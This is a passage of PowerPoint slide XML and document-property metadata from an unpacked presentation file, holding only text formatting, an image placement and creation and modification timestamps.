            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="431"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="142" name="" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2286000"/>
            <a:ext cx="9142920" cy="3383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1968</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2024-02-25T10:24:58Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-29T21:34:19Z</dcterms:modified>
  <cp:revision>26</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>